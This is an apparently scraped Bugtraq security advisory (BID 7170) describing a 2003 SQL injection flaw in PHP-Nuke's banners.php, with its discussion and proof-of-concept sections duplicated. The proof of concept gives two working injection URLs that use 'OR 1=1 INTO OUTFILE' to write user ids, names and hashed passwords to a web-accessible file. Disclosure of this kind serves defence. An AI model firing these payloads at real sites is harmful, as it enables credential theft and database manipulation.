PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
BID:7170
Info
PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
| Bugtraq ID: | 7170 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 22 2003 12:00AM |
| Updated: | Mar 22 2003 12:00AM |
| Credit: | Discovery credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 Francisco Burzi PHP-Nuke 6.0 Francisco Burzi PHP-Nuke 5.6 |
| Not Vulnerable: | |
Discussion
PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
It has been reported that an input validation error exists in the banners.php file included with PHPNuke. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and potentially access sensitive information, then download it via the web.
It has been reported that an input validation error exists in the banners.php file included with PHPNuke. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and potentially access sensitive information, then download it via the web.
Exploit / POC
PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
The following exploit information was provided by Frog Man <[email protected]>:
This will save id, name and crypted password into
http://www.example.com/banners1.txt :
http://www.example.com/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt
This will save crypted password into http://[target]/banners2.txt :
http://www.example.com/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt
The following exploit information was provided by Frog Man <[email protected]>:
This will save id, name and crypted password into
http://www.example.com/banners1.txt :
http://www.example.com/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt
This will save crypted password into http://[target]/banners2.txt :
http://www.example.com/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt
References
PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
References:
References: